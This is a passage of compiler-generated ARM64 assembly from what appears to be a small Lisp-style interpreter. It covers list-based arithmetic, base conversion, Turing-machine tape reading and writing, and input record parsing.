LBB25_12: ldr x8, [sp, #48] ldr x9, [sp, #40] add x8, x8, x9 ldur x9, [x29, #-32] add x8, x8, x9 subs x8, x8, #48 stur x8, [x29, #-40] ldur x8, [x29, #-40] subs x8, x8, #57 cset w8, gt tbnz w8, #0, LBB25_14 b LBB25_13 LBB25_13: ldur x8, [x29, #-40] str x8, [sp, #16] ; 8-byte Folded Spill ldr x0, [sp, #32] ldr x1, [sp, #24] mov x2, #0 bl _addition mov x1, x0 ldr x0, [sp, #16] ; 8-byte Folded Reload bl _cons stur x0, [x29, #-8] b LBB25_15 LBB25_14: ldur x8, [x29, #-40] subs x8, x8, #10 str x8, [sp, #8] ; 8-byte Folded Spill ldr x0, [sp, #32] ldr x1, [sp, #24] mov x2, #1 bl _addition mov x1, x0 ldr x0, [sp, #8] ; 8-byte Folded Reload bl _cons stur x0, [x29, #-8] b LBB25_15 LBB25_15: ldur x0, [x29, #-8] ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .globl _multiplication ; -- Begin function multiplication .p2align 2 _multiplication: ; @multiplication .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] str x1, [sp, #24] str xzr, [sp, #16] ldr x8, [sp, #24] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB26_2 b LBB26_1 LBB26_1: stur xzr, [x29, #-8] b LBB26_9 LBB26_2: b LBB26_3 LBB26_3: ; =>This Loop Header: Depth=1 ; Child Loop BB26_5 Depth 2 ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB26_8 b LBB26_4 LBB26_4: ; in Loop: Header=BB26_3 Depth=1 ldur x9, [x29, #-16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #8] b LBB26_5 LBB26_5: ; Parent Loop BB26_3 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x8, [sp, #8] subs x9, x8, #1 str x9, [sp, #8] subs x8, x8, #48 cset w8, le tbnz w8, #0, LBB26_7 b LBB26_6 LBB26_6: ; in Loop: Header=BB26_5 Depth=2 ldr x0, [sp, #16] ldr x1, [sp, #24] mov x2, #0 bl _addition str x0, [sp, #16] b LBB26_5 LBB26_7: ; in Loop: Header=BB26_3 Depth=1 ldur x9, [x29, #-16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-16] ldr x1, [sp, #24] mov x0, #48 bl _cons str x0, [sp, #24] b LBB26_3 LBB26_8: ldr x8, [sp, #16] stur x8, [x29, #-8] b LBB26_9 LBB26_9: ldur x0, [x29, #-8] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _exponentiation ; -- Begin function exponentiation .p2align 2 _exponentiation: ; @exponentiation .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str x1, [sp, #16] mov x0, #49 mov x1, #0 bl _cons str x0, [sp, #8] b LBB27_1 LBB27_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB27_3 b LBB27_2 LBB27_2: ; in Loop: Header=BB27_1 Depth=1 ldur x0, [x29, #-8] ldr x1, [sp, #8] bl _multiplication str x0, [sp, #8] ldr x0, [sp, #16] bl _sub1 str x0, [sp, #16] b LBB27_1 LBB27_3: ldr x0, [sp, #8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _subtraction ; -- Begin function subtraction .p2align 2 _subtraction: ; @subtraction .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] stur x1, [x29, #-24] stur x2, [x29, #-32] ldur x8, [x29, #-24] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB28_3 b LBB28_1 LBB28_1: ldur x8, [x29, #-32] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB28_3 b LBB28_2 LBB28_2: ldur x8, [x29, #-16] stur x8, [x29, #-8] b LBB28_12 LBB28_3: ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB28_5 b LBB28_4 LBB28_4: ldur x9, [x29, #-16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #48] ldur x9, [x29, #-16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #32] b LBB28_6 LBB28_5: mov x8, #48 str x8, [sp, #48] str xzr, [sp, #32] b LBB28_6 LBB28_6: ldur x8, [x29, #-24] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB28_8 b LBB28_7 LBB28_7: ldur x9, [x29, #-24] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #40] ldur x9, [x29, #-24] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #24] b LBB28_9 LBB28_8: mov x8, #48 str x8, [sp, #40] str xzr, [sp, #24] b LBB28_9 LBB28_9: ldr x8, [sp, #48] ldr x9, [sp, #40] subs x8, x8, x9 ldur x9, [x29, #-32] subs x8, x8, x9 add x8, x8, #48 stur x8, [x29, #-40] ldur x8, [x29, #-40] subs x8, x8, #48 cset w8, lt tbnz w8, #0, LBB28_11 b LBB28_10 LBB28_10: ldur x8, [x29, #-40] str x8, [sp, #16] ; 8-byte Folded Spill ldr x0, [sp, #32] ldr x1, [sp, #24] mov x2, #0 bl _subtraction mov x1, x0 ldr x0, [sp, #16] ; 8-byte Folded Reload bl _cons stur x0, [x29, #-8] b LBB28_12 LBB28_11: ldur x8, [x29, #-40] add x8, x8, #10 str x8, [sp, #8] ; 8-byte Folded Spill ldr x0, [sp, #32] ldr x1, [sp, #24] mov x2, #1 bl _subtraction mov x1, x0 ldr x0, [sp, #8] ; 8-byte Folded Reload bl _cons stur x0, [x29, #-8] b LBB28_12 LBB28_12: ldur x0, [x29, #-8] ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .globl _base2_to_10 ; -- Begin function base2_to_10 .p2align 2 _base2_to_10: ; @base2_to_10 .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str xzr, [sp, #16] b LBB29_1 LBB29_1: ; =>This Inner Loop Header: Depth=1 ldur x9, [x29, #-8] adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB29_7 b LBB29_2 LBB29_2: ; in Loop: Header=BB29_1 Depth=1 ldur x9, [x29, #-8] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #8] ldur x9, [x29, #-8] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-8] ldr x9, [sp, #8] adrp x8, _numb@GOTPAGE ldr x8, [x8, _numb@GOTPAGEOFF] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB29_4 b LBB29_3 LBB29_3: ; in Loop: Header=BB29_1 Depth=1 ldr x9, [sp, #8] adrp x8, _pname@GOTPAGE ldr x8, [x8, _pname@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB29_5 b LBB29_4 LBB29_4: ; in Loop: Header=BB29_1 Depth=1 mov x8, #1 str x8, [sp, #8] b LBB29_6 LBB29_5: ; in Loop: Header=BB29_1 Depth=1 str xzr, [sp, #8] b LBB29_6 LBB29_6: ; in Loop: Header=BB29_1 Depth=1 ldr x0, [sp, #16] ldr x1, [sp, #16] ldr x2, [sp, #8] bl _addition str x0, [sp, #16] b LBB29_1 LBB29_7: ldr x0, [sp, #16] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _base10_to_2 ; -- Begin function base10_to_2 .p2align 2 _base10_to_2: ; @base10_to_2 .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str xzr, [sp, #16] b LBB30_1 LBB30_1: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB30_6 b LBB30_2 LBB30_2: ; in Loop: Header=BB30_1 Depth=1 ldur x9, [x29, #-8] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] subs x8, x8, #48 str x8, [sp, #8] ldr x8, [sp, #8] mov x10, #2 sdiv x9, x8, x10 mul x9, x9, x10 subs x8, x8, x9 subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB30_4 b LBB30_3 LBB30_3: ; in Loop: Header=BB30_1 Depth=1 adrp x8, _wrd_one@GOTPAGE ldr x8, [x8, _wrd_one@GOTPAGEOFF] ldr x8, [x8] str x8, [sp] ; 8-byte Folded Spill b LBB30_5 LBB30_4: ; in Loop: Header=BB30_1 Depth=1 adrp x8, _wrd_zero@GOTPAGE ldr x8, [x8, _wrd_zero@GOTPAGEOFF] ldr x8, [x8] str x8, [sp] ; 8-byte Folded Spill b LBB30_5 LBB30_5: ; in Loop: Header=BB30_1 Depth=1 ldr x0, [sp] ; 8-byte Folded Reload ldr x1, [sp, #16] bl _cons str x0, [sp, #16] ldur x0, [x29, #-8] bl _halve stur x0, [x29, #-8] b LBB30_1 LBB30_6: ldr x0, [sp, #16] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _size ; -- Begin function size .p2align 2 _size: ; @size .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill stur x0, [x29, #-16] str xzr, [sp, #24] ldur x9, [x29, #-16] adrp x8, _numb@GOTPAGE ldr x8, [x8, _numb@GOTPAGEOFF] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB31_3 b LBB31_1 LBB31_1: ldur x9, [x29, #-16] adrp x8, _pname@GOTPAGE ldr x8, [x8, _pname@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB31_3 b LBB31_2 LBB31_2: mov x0, #0 bl _add1 stur x0, [x29, #-8] b LBB31_11 LBB31_3: ldr x8, [sp, #16] ; 8-byte Folded Reload ldur x9, [x29, #-16] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB31_5 b LBB31_4 LBB31_4: ldur x9, [x29, #-16] adrp x8, _pname@GOTPAGE ldr x8, [x8, _pname@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] bl _length stur x0, [x29, #-8] b LBB31_11 LBB31_5: b LBB31_6 LBB31_6: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #16] ; 8-byte Folded Reload ldur x9, [x29, #-16] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB31_10 b LBB31_7 LBB31_7: ; in Loop: Header=BB31_6 Depth=1 ldr x8, [sp, #24] str x8, [sp, #8] ; 8-byte Folded Spill ldur x9, [x29, #-16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] bl _size mov x1, x0 ldr x0, [sp, #8] ; 8-byte Folded Reload mov x2, #0 bl _addition ldr x8, [sp, #16] ; 8-byte Folded Reload str x0, [sp, #24] ldur x10, [x29, #-16] adrp x9, _cdr@GOTPAGE ldr x9, [x9, _cdr@GOTPAGEOFF] ldr x9, [x9, x10, lsl #3] stur x9, [x29, #-16] ldur x9, [x29, #-16] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB31_9 b LBB31_8 LBB31_8: ; in Loop: Header=BB31_6 Depth=1 ldr x0, [sp, #24] bl _add1 str x0, [sp, #24] b LBB31_9 LBB31_9: ; in Loop: Header=BB31_6 Depth=1 b LBB31_6 LBB31_10: ldr x0, [sp, #24] bl _add1 bl _add1 stur x0, [x29, #-8] b LBB31_11 LBB31_11: ldur x0, [x29, #-8] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _read_bit ; -- Begin function read_bit .p2align 2 _read_bit: ; @read_bit .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] str x8, [sp] ; 8-byte Folded Spill adrp x9, _turing_machine_tapes@GOTPAGE ldr x9, [x9, _turing_machine_tapes@GOTPAGEOFF] ldr x9, [x9] ldr x8, [x8, x9, lsl #3] str x8, [sp, #8] ldr x9, [sp, #8] adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB32_2 b LBB32_1 LBB32_1: adrp x8, _wrd_out_of_data@GOTPAGE ldr x8, [x8, _wrd_out_of_data@GOTPAGEOFF] ldr x9, [x8] mov x8, #0 subs x8, x8, x9 str x8, [sp, #24] b LBB32_6 LBB32_2: ldr x9, [sp] ; 8-byte Folded Reload ldr x8, [sp, #8] ldr x8, [x9, x8, lsl #3] str x8, [sp, #16] ldr x10, [sp, #8] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x8, [x8, x10, lsl #3] adrp x10, _turing_machine_tapes@GOTPAGE ldr x10, [x10, _turing_machine_tapes@GOTPAGEOFF] ldr x10, [x10] str x8, [x9, x10, lsl #3] ldr x9, [sp, #16] adrp x8, _numb@GOTPAGE ldr x8, [x8, _numb@GOTPAGEOFF] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB32_4 b LBB32_3 LBB32_3: ldr x9, [sp, #16] adrp x8, _pname@GOTPAGE ldr x8, [x8, _pname@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB32_5 b LBB32_4 LBB32_4: adrp x8, _wrd_one@GOTPAGE ldr x8, [x8, _wrd_one@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #24] b LBB32_6 LBB32_5: adrp x8, _wrd_zero@GOTPAGE ldr x8, [x8, _wrd_zero@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #24] b LBB32_6 LBB32_6: ldr x0, [sp, #24] add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _write_lst ; -- Begin function write_lst .p2align 2 _write_lst: ; @write_lst .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] str x8, [sp] ; 8-byte Folded Spill str x0, [sp, #8] ldr x9, [sp, #8] adrp x8, _numb@GOTPAGE ldr x8, [x8, _numb@GOTPAGEOFF] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB33_3 b LBB33_1 LBB33_1: ldr x9, [sp, #8] adrp x8, _pname@GOTPAGE ldr x8, [x8, _pname@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB33_3 b LBB33_2 LBB33_2: mov x0, #48 bl _write_chr b LBB33_11 LBB33_3: ldr x8, [sp] ; 8-byte Folded Reload ldr x9, [sp, #8] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB33_5 b LBB33_4 LBB33_4: ldr x9, [sp, #8] adrp x8, _pname@GOTPAGE ldr x8, [x8, _pname@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] bl _write_atm b LBB33_11 LBB33_5: mov x0, #40 bl _write_chr b LBB33_6 LBB33_6: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp] ; 8-byte Folded Reload ldr x9, [sp, #8] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB33_10 b LBB33_7 LBB33_7: ; in Loop: Header=BB33_6 Depth=1 ldr x9, [sp, #8] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] bl _write_lst ldr x8, [sp] ; 8-byte Folded Reload ldr x10, [sp, #8] adrp x9, _cdr@GOTPAGE ldr x9, [x9, _cdr@GOTPAGEOFF] ldr x9, [x9, x10, lsl #3] str x9, [sp, #8] ldr x9, [sp, #8] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB33_9 b LBB33_8 LBB33_8: ; in Loop: Header=BB33_6 Depth=1 mov x0, #32 bl _write_chr b LBB33_9 LBB33_9: ; in Loop: Header=BB33_6 Depth=1 b LBB33_6 LBB33_10: mov x0, #41 bl _write_chr b LBB33_11 LBB33_11: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _write_chr ; -- Begin function write_chr .p2align 2 _write_chr: ; @write_chr .cfi_startproc ; %bb.0: sub sp, sp, #128 .cfi_def_cfa_offset 128 stp x29, x30, [sp, #112] ; 16-byte Folded Spill add x29, sp, #112 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _wrd_zero@GOTPAGE ldr x8, [x8, _wrd_zero@GOTPAGEOFF] stur x8, [x29, #-40] ; 8-byte Folded Spill adrp x8, _wrd_one@GOTPAGE ldr x8, [x8, _wrd_one@GOTPAGEOFF] stur x8, [x29, #-32] ; 8-byte Folded Spill adrp x8, _q@GOTPAGE ldr x8, [x8, _q@GOTPAGEOFF] stur x8, [x29, #-24] ; 8-byte Folded Spill adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] stur x8, [x29, #-16] ; 8-byte Folded Spill stur x0, [x29, #-8] ldur x8, [x29, #-8] ands x8, x8, #0x80 cset w8, eq tbnz w8, #0, LBB34_2 b LBB34_1 LBB34_1: ldur x8, [x29, #-32] ; 8-byte Folded Reload ldr x8, [x8] stur x8, [x29, #-48] ; 8-byte Folded Spill b LBB34_3 LBB34_2: ldur x8, [x29, #-40] ; 8-byte Folded Reload ldr x8, [x8] stur x8, [x29, #-48] ; 8-byte Folded Spill b LBB34_3 LBB34_3: ldur x0, [x29, #-48] ; 8-byte Folded Reload mov x1, #0 bl _cons ldur x9, [x29, #-16] ; 8-byte Folded Reload ldur x8, [x29, #-24] ; 8-byte Folded Reload ldr x10, [x8] str x0, [x9, x10, lsl #3] str x0, [x8] ldur x8, [x29, #-8] ands x8, x8, #0x40 cset w8, eq tbnz w8, #0, LBB34_5 b LBB34_4 LBB34_4: ldur x8, [x29, #-32] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #56] ; 8-byte Folded Spill b LBB34_6 LBB34_5: ldur x8, [x29, #-40] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #56] ; 8-byte Folded Spill b LBB34_6 LBB34_6: ldr x0, [sp, #56] ; 8-byte Folded Reload mov x1, #0 bl _cons ldur x9, [x29, #-16] ; 8-byte Folded Reload ldur x8, [x29, #-24] ; 8-byte Folded Reload ldr x10, [x8] str x0, [x9, x10, lsl #3] str x0, [x8] ldur x8, [x29, #-8] ands x8, x8, #0x20 cset w8, eq tbnz w8, #0, LBB34_8 b LBB34_7 LBB34_7: ldur x8, [x29, #-32] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #48] ; 8-byte Folded Spill b LBB34_9 LBB34_8: ldur x8, [x29, #-40] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #48] ; 8-byte Folded Spill b LBB34_9 LBB34_9: ldr x0, [sp, #48] ; 8-byte Folded Reload mov x1, #0 bl _cons ldur x9, [x29, #-16] ; 8-byte Folded Reload ldur x8, [x29, #-24] ; 8-byte Folded Reload ldr x10, [x8] str x0, [x9, x10, lsl #3] str x0, [x8] ldur x8, [x29, #-8] ands x8, x8, #0x10 cset w8, eq tbnz w8, #0, LBB34_11 b LBB34_10 LBB34_10: ldur x8, [x29, #-32] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #40] ; 8-byte Folded Spill b LBB34_12 LBB34_11: ldur x8, [x29, #-40] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #40] ; 8-byte Folded Spill b LBB34_12 LBB34_12: ldr x0, [sp, #40] ; 8-byte Folded Reload mov x1, #0 bl _cons ldur x9, [x29, #-16] ; 8-byte Folded Reload ldur x8, [x29, #-24] ; 8-byte Folded Reload ldr x10, [x8] str x0, [x9, x10, lsl #3] str x0, [x8] ldur x8, [x29, #-8] ands x8, x8, #0x8 cset w8, eq tbnz w8, #0, LBB34_14 b LBB34_13 LBB34_13: ldur x8, [x29, #-32] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #32] ; 8-byte Folded Spill b LBB34_15 LBB34_14: ldur x8, [x29, #-40] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #32] ; 8-byte Folded Spill b LBB34_15 LBB34_15: ldr x0, [sp, #32] ; 8-byte Folded Reload mov x1, #0 bl _cons ldur x9, [x29, #-16] ; 8-byte Folded Reload ldur x8, [x29, #-24] ; 8-byte Folded Reload ldr x10, [x8] str x0, [x9, x10, lsl #3] str x0, [x8] ldur x8, [x29, #-8] ands x8, x8, #0x4 cset w8, eq tbnz w8, #0, LBB34_17 b LBB34_16 LBB34_16: ldur x8, [x29, #-32] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #24] ; 8-byte Folded Spill b LBB34_18 LBB34_17: ldur x8, [x29, #-40] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #24] ; 8-byte Folded Spill b LBB34_18 LBB34_18: ldr x0, [sp, #24] ; 8-byte Folded Reload mov x1, #0 bl _cons ldur x9, [x29, #-16] ; 8-byte Folded Reload ldur x8, [x29, #-24] ; 8-byte Folded Reload ldr x10, [x8] str x0, [x9, x10, lsl #3] str x0, [x8] ldur x8, [x29, #-8] ands x8, x8, #0x2 cset w8, eq tbnz w8, #0, LBB34_20 b LBB34_19 LBB34_19: ldur x8, [x29, #-32] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #16] ; 8-byte Folded Spill b LBB34_21 LBB34_20: ldur x8, [x29, #-40] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #16] ; 8-byte Folded Spill b LBB34_21 LBB34_21: ldr x0, [sp, #16] ; 8-byte Folded Reload mov x1, #0 bl _cons ldur x9, [x29, #-16] ; 8-byte Folded Reload ldur x8, [x29, #-24] ; 8-byte Folded Reload ldr x10, [x8] str x0, [x9, x10, lsl #3] str x0, [x8] ldur x8, [x29, #-8] ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB34_23 b LBB34_22 LBB34_22: ldur x8, [x29, #-32] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #8] ; 8-byte Folded Spill b LBB34_24 LBB34_23: ldur x8, [x29, #-40] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #8] ; 8-byte Folded Spill b LBB34_24 LBB34_24: ldr x0, [sp, #8] ; 8-byte Folded Reload mov x1, #0 bl _cons ldur x9, [x29, #-16] ; 8-byte Folded Reload ldur x8, [x29, #-24] ; 8-byte Folded Reload ldr x10, [x8] str x0, [x9, x10, lsl #3] str x0, [x8] ldp x29, x30, [sp, #112] ; 16-byte Folded Reload add sp, sp, #128 ret .cfi_endproc ; -- End function .globl _read_record ; -- Begin function read_record .p2align 2 _read_record: ; @read_record .cfi_startproc ; %bb.0: sub sp, sp, #96 .cfi_def_cfa_offset 96 stp x29, x30, [sp, #80] ; 16-byte Folded Spill add x29, sp, #80 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill adrp x8, _buffer2@GOTPAGE ldr x8, [x8, _buffer2@GOTPAGEOFF] str x8, [sp, #24] ; 8-byte Folded Spill mov x1, #0 mov x0, x1 bl _cons str x0, [sp, #40] stur x0, [x29, #-32] b LBB35_1 LBB35_1: ; =>This Inner Loop Header: Depth=1 bl _read_char stur x0, [x29, #-16] ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, ge tbnz w8, #0, LBB35_3 b LBB35_2 LBB35_2: ldur x8, [x29, #-16] stur x8, [x29, #-8] b LBB35_23 LBB35_3: ; in Loop: Header=BB35_1 Depth=1 ldur x0, [x29, #-16] mov x1, #0 bl _cons ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x9, [sp, #40] str x0, [x8, x9, lsl #3] str x0, [sp, #40] b LBB35_4 LBB35_4: ; in Loop: Header=BB35_1 Depth=1 ldur x8, [x29, #-16] subs x8, x8, #10 cset w8, ne tbnz w8, #0, LBB35_1 b LBB35_5 LBB35_5: ldr x8, [sp, #16] ; 8-byte Folded Reload ldur x9, [x29, #-32] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-32] mov x1, #0 mov x0, x1 bl _cons ldr x8, [sp, #24] ; 8-byte Folded Reload str x0, [sp, #32] str x0, [x8] stur xzr, [x29, #-24] b LBB35_6 LBB35_6: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-32] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB35_22 b LBB35_7 LBB35_7: ; in Loop: Header=BB35_6 Depth=1 ldr x8, [sp, #16] ; 8-byte Folded Reload ldur x10, [x29, #-32] adrp x9, _car@GOTPAGE ldr x9, [x9, _car@GOTPAGEOFF] ldr x9, [x9, x10, lsl #3] stur x9, [x29, #-16] ldur x9, [x29, #-32] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-32] ldur x8, [x29, #-16] subs x8, x8, #32 cset w8, eq tbnz w8, #0, LBB35_11 b LBB35_8 LBB35_8: ; in Loop: Header=BB35_6 Depth=1 ldur x8, [x29, #-16] subs x8, x8, #10 cset w8, eq tbnz w8, #0, LBB35_11 b LBB35_9 LBB35_9: ; in Loop: Header=BB35_6 Depth=1 ldur x8, [x29, #-16] subs x8, x8, #40 cset w8, eq tbnz w8, #0, LBB35_11 b LBB35_10 LBB35_10: ; in Loop: Header=BB35_6 Depth=1 ldur x8, [x29, #-16] subs x8, x8, #41 cset w8, ne tbnz w8, #0, LBB35_17 b LBB35_11 LBB35_11: ; in Loop: Header=BB35_6 Depth=1 ldur x8, [x29, #-24] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB35_13 b LBB35_12 LBB35_12: ; in Loop: Header=BB35_6 Depth=1 ldur x0, [x29, #-24] mov x1, #0 bl _cons ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x9, [sp, #32] str x0, [x8, x9, lsl #3] str x0, [sp, #32] b LBB35_13 LBB35_13: ; in Loop: Header=BB35_6 Depth=1 stur xzr, [x29, #-24] ldur x8, [x29, #-16] subs x8, x8, #32 cset w8, eq tbnz w8, #0, LBB35_16 b LBB35_14 LBB35_14: ; in Loop: Header=BB35_6 Depth=1 ldur x8, [x29, #-16] subs x8, x8, #10 cset w8, eq tbnz w8, #0, LBB35_16 b LBB35_15 LBB35_15: ; in Loop: Header=BB35_6 Depth=1 ldur x0, [x29, #-16] mov x1, #0 str x1, [sp, #8] ; 8-byte Folded Spill bl _cons ldr x1, [sp, #8] ; 8-byte Folded Reload bl _cons ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x9, [sp, #32] str x0, [x8, x9, lsl #3] str x0, [sp, #32] b LBB35_16 LBB35_16: 